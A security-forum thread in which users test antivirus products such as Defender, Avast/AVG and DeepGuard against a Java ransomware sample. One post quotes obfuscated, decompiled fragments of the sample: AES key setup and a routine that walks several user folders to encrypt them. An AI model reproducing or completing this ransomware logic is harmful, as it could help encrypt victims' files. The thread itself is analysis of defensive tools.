KonradPL
Level 4
- May 1, 2018
- 169
Please test McAfee
If someone can send me the sample, I can test both Defender and Avast/AVG.

It was on and protecting all folders that go there by default:
@marcopaone @McMcbrad Thank you both for testing Defender.
The ransomware protection of AVG/Avast prevented the encryption of documents/pictures, could Controlled Folder Access of Defender do the same?
Thanks, it's disappointing that CFA didn't make any difference.
It was on and protecting all folders that go there by default:
Nothing too unusual.
If this is bypassing CFA it must be using some sort of special technique to encrypt. CFA is very protective and doesn’t have much of a whitelist, it also causes a lot of false positives.
That’s probably part of why DeepGuard was defeated.
It might be worth trying some of the other strong behavior blockers like Kaspersky or Emsisoft.
What about ESET? Maybe ESET can do better?
Nothing too unusual.
Encryption algorithm:
import java.nio.file.Path;
import java.nio.file.SimpleFileVisitor;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
public /* synthetic */ encryptAes() throws NoSuchAlgorithmException, NoSuchPaddingException {
    encryptAes encryptAes2;
    encryptAes2.keyGenerator = KeyGenerator.getInstance(Main$Open. ((Object) [1], (int)-970469275));
    encryptAes2.encrypter = Cipher.getInstance(Main$Open. ((Object) [2], (int)-704451753));
    encryptAes2.keyGenerator.init(128);
    encryptAes2.key = encryptAes2.keyGenerator.generateKey();
These are built-in Java 6 libraries and not even loaded from GitHub.
File crawler and main algorithm:
import java.util.HashMap;
    encryptAes encryptAes2 = new encryptAes();
    Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [0], (int)-601438172)) + Main$Open. ((Object) [1], (int)-1877012877), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
    Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [2], (int)1693082425)) + Main$Open. ((Object) [3], (int)54234075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
    Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [4], (int)-557160074)) + Main$Open. ((Object) [5], (int)-135269237), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
    Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [6], (int)-504606357)) + Main$Open. ((Object) [7], (int)72707544), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
    Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [8], (int)713534176)) + Main$Open. ((Object) [9], (int)-969383075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
    Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [10], (int)1242977540)) + Main$Open. ((Object) [11], (int)906653621), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
}
What about ESET? Maybe ESET can do better?
Upon execution:
WiseVector StopX is such a beast, it is everything that Cylance promises to be but doesn't.
They say things like this every year... in newspapers every year will be the coldest from 30 years onwards, threats will evade all AVs and more...
In newspapers they say that 2021 there will be a new wave: Ransomware 2.0
So be careful and stay protected!